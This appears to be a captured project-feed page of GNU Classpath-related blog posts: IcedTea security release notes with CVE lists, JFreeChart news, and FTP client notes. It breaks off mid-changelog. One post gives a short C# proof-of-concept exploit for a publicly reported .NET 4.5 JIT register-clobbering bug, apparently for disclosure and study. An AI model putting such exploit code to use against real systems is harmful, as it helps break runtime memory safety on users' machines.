GNU Classpath

The IcedTea 2.3.x branch now uses the same version of HotSpot (hs23 from the IcedTea 2.3.x forest) for all builds: http://icedtea.classpath.org/hg/release/icedtea7-2.3/rev/4c7988ed06f8 This is following the import of the ARM32 port to the 2.3 ... [More] forest. Please test and report any issues as soon as possible. We plan to do a 2.3.11 release based on this by the end of the month. There are no planned security updates for the 2.1.x and 2.2.x branches, so they will become obsolete with the October 2013 security update. [Less]

Follow @jfreechart I decided it is well past the right time for me to learn more about graphics technologies on the web so, after wrapping up the JFreeChart 1.0.15 release on Monday, I started exploring. Those of you that haven't been living under ... [More] a rock for the last few years (as I have been) will already know that the HTML5 Canvas element has an API that's, more or less, functionally equivalent to the Java2D API. I had to convince myself of this, of course, so I wrote a general purpose Java class (CanvasGraphics2D) that maps Graphics2D API calls in Java and emits corresponding Javascript code, and hooked it up to JFreeChart. The result is pretty nice, even if not that useful (the generated Javascript paints a picture with a fixed dimension so, coming from Java, we might as well have just provided a PNG image directly...with a bit of Javascript wizardry there is probably a solution to that, but not now). Here's the output for a sample chart (click here for the live Javascript version) which also tells us some interesting things about how browser usage is changing: After running CanvasGraphics2D on many of the JFreeChart demo charts and seeing the output, I'm not as reluctant as I once was to learn more Javascript! Thankfully the tools for writing and debugging Javascript have improved also so in the near future...well we'll see. Alongside Canvas, browser support for the Scalable Vector Graphic (SVG) format appears to have evolved considerably during my time under the rock. So following my success in creating a working CanvasGraphics2D in a short space of time, and being in 'R&D' mode at the moment, I decided to have a go at a light-weight SVGGraphics2D implementation (Batik exists for a long time, but I don't think it can be described as light-weight). This also didn't take all that long, and after connecting it up to JFreeChart here's the result (click here for the "live" SVG version): This format is a bit more useful coming from Java than the output from CanvasGraphics2D because SVG has built-in support for scaling, so the quality of the image is retained as it is scaled in the browser (or anywhere else), which is nicer than what you get from PNG or other image formats: Furthermore, the SVG format can be used in a lot of other places besides the browser, so this light-weight SVGGraphics2D class has some utility. It is working well with JFreeChart, but I have a little more work to do on it (there is no image support so far, and the clipping and transforming code also needs some work). Once it is complete, I plan to attach a proprietary (gasp) licence to it and include it as a small bonus to developers that purchase the JFreeChart Developer Guide...and give an additional incentive for people to (financially) support my open source work. Follow @jfreechart [Less]

I added some long-due functions to FTP, handled by a request dialogLocal and Remote RenameLocal and Remote New FolderFurthermore, currently it is boring that after each operation the file lists are not updated.I thus changed the core representation ... [More] , fileTable, to be a mutable array and added basic manipultation methods. I will the progressively add provision to update dynamically the list after operations. Right now I worked on delete. The first impact is that the contents of the selection need always be copied before launching an operation, otherwise operations with selections larger than one element may fail or behave wrongly after the first element got processed.Also, I noticed that FTP lacks a refresh function. Sometimes after years you notice the most basic things! I'll need to implement that. [Less]

Since two weeks ago my office has been this hillside hut. It’s a bit of a change from the pokey junkroom I’ve worked from this past twelve years. It’s a bit spartan inside right now–just a desk, a chair and a computer–but I’ll post some pictures later when I’ve jazzed it up a bit.

The IcedTea project provides a harness to build the source code from OpenJDK using Free Software build tools, along with additional features such as a PulseAudio sound driver and support for alternative virtual machines. These releases update our ... [More] OpenJDK 6 support to include the latest security updates. We recommend that users upgrade as soon as possible. The security fixes are as follows: S6741606, CVE-2013-2407: Integrate Apache Santuario S7158805, CVE-2013-2445: Better rewriting of nested subroutine calls S7170730, CVE-2013-2451: Improve Windows network stack support. S8000638, CVE-2013-2450: Improve deserialization S8000642, CVE-2013-2446: Better handling of objects for transportation S8001032: Restrict object access S8001033, CVE-2013-2452: Refactor network address handling in virtual machine identifiers S8001034, CVE-2013-1500: Memory management improvements S8001038, CVE-2013-2444: Resourcefully handle resources S8001043: Clarify definition restrictions S8001309: Better handling of annotation interfaces S8001318, CVE-2013-2447: Socket.getLocalAddress not consistent with InetAddress.getLocalHost S8001330, CVE-2013-2443: Improve on checking order S8003703, CVE-2013-2412: Update RMI connection dialog box S8004584: Augment applet contextualization S8005007: Better glyph processing S8006328, CVE-2013-2448: Improve robustness of sound classes S8006611: Improve scripting S8007467: Improve robustness of JMX internal APIs S8007471: Improve MBean notifications S8007812, CVE-2013-2455: (reflect) Class.getEnclosingMethod problematic for some classes S8008120, CVE-2013-2457: Improve JMX class checking S8008124, CVE-2013-2453: Better compliance testing S8008128: Better API coherence for JMX S8008132, CVE-2013-2456: Better serialization support S8008585: Better JMX data handling S8008593: Better URLClassLoader resource management S8008603: Improve provision of JMX providers S8008611: Better handling of annotations in JMX S8008615: Improve robustness of JMX internal APIs S8008623: Better handling of MBeanServers S8008744, CVE-2013-2407: Rework part of fix for JDK-6741606 S8008982: Adjust JMX for underlying interface changes S8009004: Better implementation of RMI connections S8009013: Better handling of T2K glyphs S8009034: Improve resulting notifications in JMX S8009038: Improve JMX notification support S8009067: Improve storing keys in KeyStore S8009071, CVE-2013-2459: Improve shape handling S8009235: Improve handling of TSA data S8011243, CVE-2013-2470: Improve ImagingLib S8011248, CVE-2013-2471: Better Component Rasters S8011253, CVE-2013-2472: Better Short Component Rasters S8011257, CVE-2013-2473: Better Byte Component Rasters S8012375, CVE-2013-1571: Improve Javadoc framing S8012421: Better positioning of PairPositioning S8012438, CVE-2013-2463: Better image validation S8012597, CVE-2013-2465: Better image channel verification S8012601, CVE-2013-2469: Better validation of image layouts S8014281, CVE-2013-2461: Better checking of XML signature S8015997: Additional improvement in Javadoc framing IcedTea includes the usual IcedTea patches to allow builds against system libraries and to support more esoteric architectures. If you find an issue with the release, please report it to our bug database under the appropriate component. Development discussion takes place on the distro-pkg-dev OpenJDK mailing list and patches are always welcome. Full details of the release can be found below. Note that we have also included a subset of the changes which were part of the 7u25 update, compromising of those which we thought safest to include in a stable 6 release. What’s New? New in release 1.11.12 (2013-07-10) Security fixes S6741606, CVE-2013-2407: Integrate Apache Santuario S7158805, CVE-2013-2445: Better rewriting of nested subroutine calls S7170730, CVE-2013-2451: Improve Windows network stack support. S8000638, CVE-2013-2450: Improve deserialization S8000642, CVE-2013-2446: Better handling of objects for transportation S8001032: Restrict object access S8001033, CVE-2013-2452: Refactor network address handling in virtual machine identifiers S8001034, CVE-2013-1500: Memory management improvements S8001038, CVE-2013-2444: Resourcefully handle resources S8001043: Clarify definition restrictions S8001309: Better handling of annotation interfaces S8001318, CVE-2013-2447: Socket.getLocalAddress not consistent with InetAddress.getLocalHost S8001330, CVE-2013-2443: Improve on checking order S8003703, CVE-2013-2412: Update RMI connection dialog box S8004584: Augment applet contextualization S8005007: Better glyph processing S8006328, CVE-2013-2448: Improve robustness of sound classes S8006611: Improve scripting S8007467: Improve robustness of JMX internal APIs S8007471: Improve MBean notifications S8007812, CVE-2013-2455: (reflect) Class.getEnclosingMethod problematic for some classes S8008120, CVE-2013-2457: Improve JMX class checking S8008124, CVE-2013-2453: Better compliance testing S8008128: Better API coherence for JMX S8008132, CVE-2013-2456: Better serialization support S8008585: Better JMX data handling S8008593: Better URLClassLoader resource management S8008603: Improve provision of JMX providers S8008611: Better handling of annotations in JMX S8008615: Improve robustness of JMX internal APIs S8008623: Better handling of MBeanServers S8008744, CVE-2013-2407: Rework part of fix for JDK-6741606 S8008982: Adjust JMX for underlying interface changes S8009004: Better implementation of RMI connections S8009013: Better handling of T2K glyphs S8009034: Improve resulting notifications in JMX S8009038: Improve JMX notification support S8009067: Improve storing keys in KeyStore S8009071, CVE-2013-2459: Improve shape handling S8009235: Improve handling of TSA data S8011243, CVE-2013-2470: Improve ImagingLib S8011248, CVE-2013-2471: Better Component Rasters S8011253, CVE-2013-2472: Better Short Component Rasters S8011257, CVE-2013-2473: Better Byte Component Rasters S8012375, CVE-2013-1571: Improve Javadoc framing S8012421: Better positioning of PairPositioning S8012438, CVE-2013-2463: Better image validation S8012597, CVE-2013-2465: Better image channel verification S8012601, CVE-2013-2469: Better validation of image layouts S8014281, CVE-2013-2461: Better checking of XML signature S8015997: Additional improvement in Javadoc framing Backports S6469266: Integrate Apache XMLSec 1.4.2 into JDK 7 S6541350: TimeZone display names localization S6656651: Windows Look and Feel LCD glyph images have some differences from native applications. S6786028: Javadoc HTML WCAG 2.0 accessibility issues in standard doclet – Bold tags should be strong S6786682: Javadoc HTML WCAG 2.0 accessibility issues in standard doclet – HTML tag should have lang attribute S6786688: Javadoc HTML WCAG 2.0 accessibility issues in standard doclet – Table must have captions and headers S6786690: Javadoc HTML WCAG 2.0 accessibility issues in standard doclet – DL tag and nesting issue S6802694: Javadoc doclet does not display deprecated information with -nocomment option for serialized form S6821191: Timezone display name localization S6851834: Javadoc doclet needs a structured approach to generate the output HTML. S6888167: memory leaks in the medialib glue code S6961178: Allow doclet.xml to contain XML attributes S6977550: (tz) Support tzdata2010l S6996686: (tz) Support tzdata2010o S7006270: Several javadoc regression tests are failing on windows S7017800: (tz) Support tzdata2011b S7027387: (tz) Support tzdata2011d S7033174: (tz) Support tzdata2011e S7039469: (tz) Support tzdata2011g S7090843: (tz) Support tzdata2011j S7103108: (tz) Support tzdata2011l S7103405: Correct display names for Pacific/Apia timezone S7104126: Insert openjdk copyright header back into TZdata files S7158483: (tz) Support tzdata2012c S7171223: Building ExtensionSubtables.cpp should use -fno-strict-aliasing S7198570: (tz) Support tzdata2012f S7195301: XML Signature DOM implementation should not use instanceof to determine type of Node S8002225: (tz) Support tzdata2012i S8009165: Fix for 8006435 needs revision S8009217: REGRESSION: test com/sun/org/apache/xml/internal/security/transforms/ClassLoaderTest.java fails to compile since 7u21b03 S8009530: ICU Kern table support broken S8009610: Blacklist certificate used with malware. S8009987: (tz) Support tzdata2013b S8009996: tests javax/management/mxbean/MiscTest.java and javax/management/mxbean/StandardMBeanOverrideTest.java fail S8010714: XML DSig API allows a RetrievalMethod to reference another RetrievalMethod S8010727: WLS fails to add a logger with “” in its own LogManager subclass instance S8010939: Deadlock in LogManager S8011154: java/awt/Frame/ShapeNotSetSometimes/ShapeNotSetSometimes.java failed since 7u25b03 on windows S8011557: Improve reflection utility classes S8011992: java/awt/image/mlib/MlibOpsTest.java failed since jdk7u25b05 S8012112: java/awt/image/mlib/MlibOpsTest.java fails on sparc solaris S8012617: ArrayIndexOutOfBoundsException with some fonts using LineBreakMeasurer S8012933: Test closed/java/awt/Dialog/DialogAnotherThread/JaWSTest.java fails since jdk 7u25 b07 S8013196: TimeZone.getDefault() throws NPE due to sun.awt.AppContext.getAppContext() S8014427: REGRESSION: closed/javax/imageio/plugins/bmp/Write3ByteBgrTest.java fails since 7u25 b09 S8014718: Netbeans IDE begins to throw a lot exceptions since 7u25 b10 New in release 1.12.6 (2013-07-10) Security fixes S6741606, CVE-2013-2407: Integrate Apache Santuario S7158805, CVE-2013-2445: Better rewriting of nested subroutine calls S7170730, CVE-2013-2451: Improve Windows network stack support. S8000638, CVE-2013-2450: Improve deserialization S8000642, CVE-2013-2446: Better handling of objects for transportation S8001032: Restrict object access S8001033, CVE-2013-2452: Refactor network address handling in virtual machine identifiers S8001034, CVE-2013-1500: Memory management improvements S8001038, CVE-2013-2444: Resourcefully handle resources S8001043: Clarify definition restrictions S8001309: Better handling of annotation interfaces S8001318, CVE-2013-2447: Socket.getLocalAddress not consistent with InetAddress.getLocalHost S8001330, CVE-2013-2443: Improve on checking order S8003703, CVE-2013-2412: Update RMI connection dialog box S8004584: Augment applet contextualization S8005007: Better glyph processing S8006328, CVE-2013-2448: Improve robustness of sound classes S8006611: Improve scripting S8007467: Improve robustness of JMX internal APIs S8007471: Improve MBean notifications S8007812, CVE-2013-2455: (reflect) Class.getEnclosingMethod problematic for some classes S8008120, CVE-2013-2457: Improve JMX class checking S8008124, CVE-2013-2453: Better compliance testing S8008128: Better API coherence for JMX S8008132, CVE-2013-2456: Better serialization support S8008585: Better JMX data handling S8008593: Better URLClassLoader resource management S8008603: Improve provision of JMX providers S8008611: Better handling of annotations in JMX S8008615: Improve robustness of JMX internal APIs S8008623: Better handling of MBeanServers S8008744, CVE-2013-2407: Rework part of fix for JDK-6741606 S8008982: Adjust JMX for underlying interface changes S8009004: Better implementation of RMI connections S8009013: Better handling of T2K glyphs S8009034: Improve resulting notifications in JMX S8009038: Improve JMX notification support S8009067: Improve storing keys in KeyStore S8009071, CVE-2013-2459: Improve shape handling S8009235: Improve handling of TSA data S8011243, CVE-2013-2470: Improve ImagingLib S8011248, CVE-2013-2471: Better Component Rasters S8011253, CVE-2013-2472: Better Short Component Rasters S8011257, CVE-2013-2473: Better Byte Component Rasters S8012375, CVE-2013-1571: Improve Javadoc framing S8012421: Better positioning of PairPositioning S8012438, CVE-2013-2463: Better image validation S8012597, CVE-2013-2465: Better image channel verification S8012601, CVE-2013-2469: Better validation of image layouts S8014281, CVE-2013-2461: Better checking of XML signature S8015997: Additional improvement in Javadoc framing Backports S6469266: Integrate Apache XMLSec 1.4.2 into JDK 7 S6541350: TimeZone display names localization S6656651: Windows Look and Feel LCD glyph images have some differences from native applications. S6786028: Javadoc HTML WCAG 2.0 accessibility issues in standard doclet – Bold tags should be strong S6786682: Javadoc HTML WCAG 2.0 accessibility issues in standard doclet – HTML tag should have lang attribute S6786688: Javadoc HTML WCAG 2.0 accessibility issues in standard doclet – Table must have captions and headers S6786690: Javadoc HTML WCAG 2.0 accessibility issues in standard doclet – DL tag and nesting issue S6802694: Javadoc doclet does not display deprecated information with -nocomment option for serialized form S6821191: Timezone display name localization S6851834: Javadoc doclet needs a structured approach to generate the output HTML. S6888167: memory leaks in the medialib glue code S6961178: Allow doclet.xml to contain XML attributes S6977550: (tz) Support tzdata2010l S6996686: (tz) Support tzdata2010o S7006270: Several javadoc regression tests are failing on windows S7017800: (tz) Support tzdata2011b S7027387: (tz) Support tzdata2011d S7033174: (tz) Support tzdata2011e S7039469: (tz) Support tzdata2011g S7090843: (tz) Support tzdata2011j S7103108: (tz) Support tzdata2011l S7103405: Correct display names for Pacific/Apia timezone S7104126: Insert openjdk copyright header back into TZdata files S7158483: (tz) Support tzdata2012c S7171223: Building ExtensionSubtables.cpp should use -fno-strict-aliasing S7198570: (tz) Support tzdata2012f S7195301: XML Signature DOM implementation should not use instanceof to determine type of Node S8002225: (tz) Support tzdata2012i S8009165: Fix for 8006435 needs revision S8009217: REGRESSION: test com/sun/org/apache/xml/internal/security/transforms/ClassLoaderTest.java fails to compile since 7u21b03 S8009530: ICU Kern table support broken S8009610: Blacklist certificate used with malware. S8009987: (tz) Support tzdata2013b S8009996: tests javax/management/mxbean/MiscTest.java and javax/management/mxbean/StandardMBeanOverrideTest.java fail S8010714: XML DSig API allows a RetrievalMethod to reference another RetrievalMethod S8010727: WLS fails to add a logger with “” in its own LogManager subclass instance S8010939: Deadlock in LogManager S8011154: java/awt/Frame/ShapeNotSetSometimes/ShapeNotSetSometimes.java failed since 7u25b03 on windows S8011557: Improve reflection utility classes S8011992: java/awt/image/mlib/MlibOpsTest.java failed since jdk7u25b05 S8012112: java/awt/image/mlib/MlibOpsTest.java fails on sparc solaris S8012617: ArrayIndexOutOfBoundsException with some fonts using LineBreakMeasurer S8012933: Test closed/java/awt/Dialog/DialogAnotherThread/JaWSTest.java fails since jdk 7u25 b07 S8013196: TimeZone.getDefault() throws NPE due to sun.awt.AppContext.getAppContext() S8014427: REGRESSION: closed/javax/imageio/plugins/bmp/Write3ByteBgrTest.java fails since 7u25 b09 S8014718: Netbeans IDE begins to throw a lot exceptions since 7u25 b10 The tarballs can be downloaded from: http://icedtea.classpath.org/download/source/icedtea6-1.11.12.tar.gz http://icedtea.classpath.org/download/source/icedtea6-1.12.6.tar.gz SHA256 checksums: 7b2dbad30b233a631dea6631385570ebfa851390e359fd2ef193da0f76a9d884 icedtea6-1.11.12.tar.gz 18d98fd05ef8d5088b09c444e0b025a8295181c6ae2efb6ebefe0a0397062865 icedtea6-1.12.6.tar.gz The tarballs are accompanied by a digital signature available at: http://icedtea.classpath.org/download/source/icedtea6-1.11.12.tar.gz.sig http://icedtea.classpath.org/download/source/icedtea6-1.12.6.tar.gz.sig respectively. This is produced using my public key. See details below. PGP Key: 248BDC07 (https://keys.indymedia.org/) Fingerprint = EC5A 1F5E C0AD 1D15 8F1F 8F91 3B96 A578 248B DC07 The following people helped with these releases: Severin Gehwolf (S7170730, S8001032, S8008585,S8009067) Andrew Hughes (all other bug fixes, application of security fixes & backports, release management) Omair Majid (non-security 7u25 backports) Chris Phillips (HotSpot security backports) We would also like to thank the bug reporters and testers! To get started: $ tar xzf icedtea-${ver}.tar.gz $ mkdir icedtea-build $ cd icedtea-build $ ../icedtea-${ver}/configure $ make where ${ver} is the version used. Full build requirements and instructions are available in the INSTALL file. Happy hacking! [Less]

I did not discover this vulnerability (Alon Fliess filed the (public) bug report), but I decided to investigate it and write a PoC exploit: using System; using System.Runtime.CompilerServices; ... [More] struct Foo {   byte b1, b2, b3; } class U1 { } class U2 { } struct StackFields {   internal object f1;   internal U1 f2;   internal U2 f3; } class Program {   long field1;   long field2;   static void Main() {     new Program().Get(new Foo[1, 1]);   }   [MethodImpl(MethodImplOptions.NoInlining)]   object Get (T[,] arr) {     StackFields fields = new StackFields();     fields.f1 = new U1();     fields.f2 = new U1();     fields.f3 = new U2();     arr.ToString();     object v = arr[0, 0];     field2 = field1;     Console.WriteLine(fields.f3);     return v;   } } This requires .NET 4.5 x64 (and must be built/run in release mode). The bug is that the array accessor that is generated clobbers the RSI and RDI registers. [Less]

A new release of JFreeChart is now available for download. This release contains support for non-visible series in XYBarRenderer, minor gridlines in PolarPlot, new legend item ordering options, chart editor enhancements, updates to ... [More] StandardDialScale, localisation files for Japanese, refactored parameter checks and a fix for a minor security flaw in the DisplayChart class, detected and reported by OSI Security: http://www.osisecurity.com.au/advisories/jfreechart-path-disclosure. Follow @jfreechart Here is a sample chart created by JFreeChart: Patches: 3500621 : LegendTitle order attribute (by Simon Kaczor); 3463807 : ChartComposite does not dispose popup (by Sebastiao Correia); 3204823 : PaintAlpha for 3D effects (by Dave Law); Bug Fixes: 3561093 : Rendering anomaly for XYPlots; 3555275 : ValueAxis.reserveSpace() problem for axes with fixed dimension; 3521736 : DeviationRenderer optimisation (by Milan Ramaiya); 3514487 : SWTGraphics2D get/setStroke() problem; 3508799 : DefaultPolarItemRenderer does not populate seriesKey in LegendItem; 3482106 : Missing text in SWTGraphics2D (by Kevin Xu); 3484408 : Maven fixes (Martin Hoeller); 3484403 : DateAxis endless loop (by Martin Hoeller); 3446965 : TimeSeries calculates range incorrectly in addOrUpdate(); 3445507 : TimeSeriesCollection.findRangeBounds() regression; 3425881 : XYDifferenceRenderer fix (by Patrick Schlott/Christoph Schroeder); 2963199 : SWT print job (by Jonas Rüttimann); 2879650 : Path disclosure vulnerability in DisplayChart servlet; Also fixed a rendering issue for polar charts using an inverted axis. Please help to spread the word about JFreeChart (blogs, tweets and word-of-mouth are all appreciated), and if you are using JFreeChart at your company please consider supporting our project by purchasing the JFreeChart Developer Guide and demo source code. Financial support is critically important for the project. Tweet Special thanks to the whole team at SourceForge for providing more than a decade of free infrastructure and hosting to the JFreeChart project! [Less]

The IcedTea project provides a harness to build the source code from OpenJDK using Free Software build tools, along with additional features such as a PulseAudio sound driver and support for alternative virtual machines. This release updates our ... [More] OpenJDK 7 support to include the latest security updates. As mentioned in the notes for the 2.4.0 release, we also continue to track the upcoming u40 release upstream and this update synchronises IcedTea with 7u40 b31. The security fixes are as follows: S6741606, CVE-2013-2407: Integrate Apache Santuario S7158805, CVE-2013-2445: Better rewriting of nested subroutine calls S7170730, CVE-2013-2451: Improve Windows network stack support. S8000638, CVE-2013-2450: Improve deserialization S8000642, CVE-2013-2446: Better handling of objects for transportation S8001032: Restrict object access S8001033, CVE-2013-2452: Refactor network address handling in virtual machine identifiers S8001034, CVE-2013-1500: Memory management improvements S8001038, CVE-2013-2444: Resourcefully handle resources S8001043: Clarify definition restrictions S8001308: Update display of applet windows S8001309: Better handling of annotation interfaces S8001318, CVE-2013-2447: Socket.getLocalAddress not consistent with InetAddress.getLocalHost S8001330, CVE-2013-2443: Improve on checking order (non-Zero builds only) S8003703, CVE-2013-2412: Update RMI connection dialog box S8004288, CVE-2013-2449: (fs) Files.probeContentType problems S8004584: Augment applet contextualization S8005007: Better glyph processing S8006328, CVE-2013-2448: Improve robustness of sound classes S8006611: Improve scripting S8007467: Improve robustness of JMX internal APIs S8007471: Improve MBean notifications S8007812, CVE-2013-2455: (reflect) Class.getEnclosingMethod problematic for some classes S8007925: Improve cmsStageAllocLabV2ToV4curves S8007926: Improve cmsPipelineDup S8007927: Improve cmsAllocProfileSequenceDescription S8007929: Improve CurvesAlloc S8008120, CVE-2013-2457: Improve JMX class checking S8008124, CVE-2013-2453: Better compliance testing S8008128: Better API coherence for JMX S8008132, CVE-2013-2456: Better serialization support S8008585: Better JMX data handling S8008593: Better URLClassLoader resource management S8008603: Improve provision of JMX providers S8008607: Better input checking in JMX S8008611: Better handling of annotations in JMX S8008615: Improve robustness of JMX internal APIs S8008623: Better handling of MBeanServers S8008744, CVE-2013-2407: Rework part of fix for JDK-6741606 S8008982: Adjust JMX for underlying interface changes S8009004: Better implementation of RMI connections S8009008: Better manage management-api S8009013: Better handling of T2K glyphs S8009034: Improve resulting notifications in JMX S8009038: Improve JMX notification support S8009057, CVE-2013-2448: Improve MIDI event handling S8009067: Improve storing keys in KeyStore S8009071, CVE-2013-2459: Improve shape handling S8009235: Improve handling of TSA data S8009424, CVE-2013-2458: Adapt Nashorn to JSR-292 implementation change S8009554, CVE-2013-2454: Improve SerialJavaObject.getFields S8009654: Improve stability of cmsnamed S8010209, CVE-2013-2460: Better provision of factories S8011243, CVE-2013-2470: Improve ImagingLib S8011248, CVE-2013-2471: Better Component Rasters S8011253, CVE-2013-2472: Better Short Component Rasters S8011257, CVE-2013-2473: Better Byte Component Rasters S8012375, CVE-2013-1571: Improve Javadoc framing S8012421: Better positioning of PairPositioning S8012438, CVE-2013-2463: Better image validation S8012597, CVE-2013-2465: Better image channel verification S8012601, CVE-2013-2469: Better validation of image layouts S8014281, CVE-2013-2461: Better checking of XML signature S8015997: Additional improvement in Javadoc framing IcedTea includes the usual IcedTea patches to allow builds against system libraries and to support more esoteric architectures. In this release, use of the system version of LCMS is disabled by default to ensure the most secure version is used. Before using the system version, please ensure it is version 2.5 or above, or it has the S8007925, S8007926, S8007927, S8007929 and S8009654 updates listed above. If you find an issue with the release, please report it to our bug database under the appropriate component. Development discussion takes place on the distro-pkg-dev OpenJDK mailing list and patches are always welcome. Full details of the release can be found below. Note that the unusually large number of OpenJDK changes is due to the upstream synchronisation mentioned above. What’s New? New in release 2.4.1 (2013-07-05) Security fixes S6741606, CVE-2013-2407: Integrate Apache Santuario S7158805, CVE-2013-2445: Better rewriting of nested subroutine calls S7170730, CVE-2013-2451: Improve Windows network stack support. S8000638, CVE-2013-2450: Improve deserialization S8000642, CVE-2013-2446: Better handling of objects for transportation S8001032: Restrict object access S8001033, CVE-2013-2452: Refactor network address handling in virtual machine identifiers S8001034, CVE-2013-1500: Memory management improvements S8001038, CVE-2013-2444: Resourcefully handle resources S8001043: Clarify definition restrictions S8001308: Update display of applet windows S8001309: Better handling of annotation interfaces S8001318, CVE-2013-2447: Socket.getLocalAddress not consistent with InetAddress.getLocalHost S8001330, CVE-2013-2443: Improve on checking order (non-Zero builds only) S8003703, CVE-2013-2412: Update RMI connection dialog box S8004288, CVE-2013-2449: (fs) Files.probeContentType problems S8004584: Augment applet contextualization S8005007: Better glyph processing S8006328, CVE-2013-2448: Improve robustness of sound classes S8006611: Improve scripting S8007467: Improve robustness of JMX internal APIs S8007471: Improve MBean notifications S8007812, CVE-2013-2455: (reflect) Class.getEnclosingMethod problematic for some classes S8007925: Improve cmsStageAllocLabV2ToV4curves S8007926: Improve cmsPipelineDup S8007927: Improve cmsAllocProfileSequenceDescription S8007929: Improve CurvesAlloc S8008120, CVE-2013-2457: Improve JMX class checking S8008124, CVE-2013-2453: Better compliance testing S8008128: Better API coherence for JMX S8008132, CVE-2013-2456: Better serialization support S8008585: Better JMX data handling S8008593: Better URLClassLoader resource management S8008603: Improve provision of JMX providers S8008607: Better input checking in JMX S8008611: Better handling of annotations in JMX S8008615: Improve robustness of JMX internal APIs S8008623: Better handling of MBeanServers S8008744, CVE-2013-2407: Rework part of fix for JDK-6741606 S8008982: Adjust JMX for underlying interface changes S8009004: Better implementation of RMI connections S8009008: Better manage management-api S8009013: Better handling of T2K glyphs S8009034: Improve resulting notifications in JMX S8009038: Improve JMX notification support S8009057, CVE-2013-2448: Improve MIDI event handling S8009067: Improve storing keys in KeyStore S8009071, CVE-2013-2459: Improve shape handling S8009235: Improve handling of TSA data S8009424, CVE-2013-2458: Adapt Nashorn to JSR-292 implementation change S8009554, CVE-2013-2454: Improve SerialJavaObject.getFields S8009654: Improve stability of cmsnamed S8010209, CVE-2013-2460: Better provision of factories S8011243, CVE-2013-2470: Improve ImagingLib S8011248, CVE-2013-2471: Better Component Rasters S8011253, CVE-2013-2472: Better Short Component Rasters S8011257, CVE-2013-2473: Better Byte Component Rasters S8012375, CVE-2013-1571: Improve Javadoc framing S8012421: Better positioning of PairPositioning S8012438, CVE-2013-2463: Better image validation S8012597, CVE-2013-2465: Better image channel verification S8012601, CVE-2013-2469: Better validation of image layouts S8014281, CVE-2013-2461: Better checking of XML signature S8015997: Additional improvement in Javadoc framing OpenJDK S2223192: [macosx] “opposite” seems always null in focus events S4504275: CORBA boolean type unions do not generate compilable code from idlj S6337518: Null Arrow Button Throws Exception in BasicComboBoxUI S6429204: (se) Concurrent Selector.register and SelectionKey.interestOps can ignore interestOps S6436314: Vector could be created with appropriate size in DefaultComboBoxModel S6443505: Ideal() function for CmpLTMask S6470730: Disconnect button leads to wrong popup message S6725714: par compact – add a table to speed up bitmap searches S6761744: Hotspot crashes if process size limit is exceeded S6843375: Debuggee VM crashes performing mark-sweep-compact S7038105: File.isHidden() should return true for pagefile.sys and hiberfil.sys S7053526: Upgrade JDK 8 to use Little CMS 2.4 S7056447: test/java/lang/management/ManagementFactory/MBeanServerMXBeanUnsupportedTest.java fails in agentvm S7066063: CMS: “Conservation Principle” assert failed S7068740: If you wrap a JTable in a JLayer you can’t use the page up and page down cmds S7105030: [TEST_BUG] [macosx] The tests never finishes S7109087: gc/7072527/TestFullGCCount.java fails when GC is set in command-line S7109977: [macosx] MixingInHwPanel.java test fails on Mac trying to click in the reserved corner S7115383: TEST_BUG: some jtreg tests fail because they explicitly specify -server option S7124520: [macosx] re:6373505 Toolkit.getScreenResolution() != GraphicsConfiguration.getNormalizingTransform() S7132378: Race in FutureTask if used with explicit set ( not Runnable ) S7142919: TEST_BUG: java/nio/channels/AsyncCloseAndInterrupt.java failing intermittently [sol11] S7151823: The test incorrectly recognizing OS S7152798: TEST_BUG: sun/management/HotspotClassLoadingMBean/GetClassLoadingTime.java does not compile S7152866: Tests not run because they are missing the @run tag S7157656: (zipfs) SeekableByteChannel to entry in zip file always reports its position as 0 S7158350: [macosx] Strange results of SwingUIText printing S7160084: javac fails to compile an apparently valid class/interface combination S7163898: add isLoggable() check to doLog() S7164256: EnumMap clone doesn’t clear the entrySet keeping a reference to the original Map S7174966: With OCSP enabled on Java 7 get error ‘Wrong key usage’ with Comodo certificate S7176220: ‘Full GC’ events miss date stamp information occasionally S7176479: G1: JVM crashes on T5-8 system with 1.5 TB heap S7179050: [macosx] Make LWAWT be able to run on AppKit thread S7179353: try-with-resources fails to compile with generic exception parameters S7181710: [macosx] jawt_md.h shipped with jdk is outdated S7183520: [macosx]Unable to print out the defined page for 2D_PrintingTiger/JTablePrintPageRangesTest S7183800: TEST_BUG: Update tests to run on Ubuntu 12.04 (localhost is 127.0.1.1) S7184908: TEST_BUG: [macosx] closed/com/sun/java/swing/plaf/gtk/4928019/bug4928019.java fails S7184945: [macosx] NPE in AquaComboBoxUI since jdk7u6b17, jdk8b47 S7186737: Unable to allocate bit maps or card tables for parallel gc for the requested heap S7190897: (fs) Files.isWritable method returns false when the path is writable (win) S7194902: [macosx] closed/java/awt/Button/DoubleActionEventTest/DoubleActionEventTest failed since jdk8b49 S7196080: assert(max_heap >= InitialHeapSize) in arguments.cpp S7196277: JSR 292: Two jck/runtime tests crash on java.lang.invoke.MethodHandle.invokeExact S7197666: java -d64 -version core dumps in a box with lots of memory S7198229: Painting during resizing of the frame should be more smooth S7199143: RFE: OCSP revocation checker should provide possibility to specify connection timeout S8000435: [macosx] Button painting error under Java 7 on Mac S8000450: Restrict access to com/sun/corba/se/impl package S8000529: Regression: SimpleDateFormat incorrectly parses dates formatted with Z and z pattern letters S8000629: [macosx] Blurry rendering with Java 7 on Retina display S8000973: SA on windows thread inspection is broken S8002070: Remove the stack search for a resource bundle for Logger to use S8002308: [macosx] 7198229 should be applied to the user action only S8002390: (zipfs) Problems moving files between zip file systems S8003169: [macosx] JVM crash after disconnecting from projector S8003173: [macosx] Fullscreen on Mac leaves an empty rectangle S8003268: SharedRuntime::generate_native_wrapper doesn’t save all registers across runtime tracing calls for JNI critical native methods S8003992: File and other classes in java.io do not handle embedded nulls properly S8004821: Graphics2D.drawPolygon() fails with IllegalPathStateException S8004866: [macosx] HiDPI support in Aqua L&F S8005032: G1: Cleanup serial reference processing closures in concurrent marking S8005405: [macosx] Drag and Drop: wrong animation when dropped outside any drop target. S8005527: [TEST_BUG] console.sh failed Automatically with exit code 1. S8005555: TEST_BUG: java/io/Serializable/accessConstants/AccessConstants.java should be removed S8005956: C2: assert(!def_outside->member(r)) failed: Use of external LRG overlaps the same LRG defined in this block S8005997: [macosx] Printer Dialog opens an additional title bar S8006008: Memory leak in hotspot/src/share/vm/adlc/archDesc.cpp S8006014: Memory leak in hotspot/src/share/vm/adlc/dfa.cpp S8006016: Memory leak at hotspot/src/share/vm/adlc/output_c.cpp S8006242: G1: WorkerDataArray<T>::verify() too strict for double calculations S8006328: Improve robustness of sound classes S8006423: SA: NullPointerException in 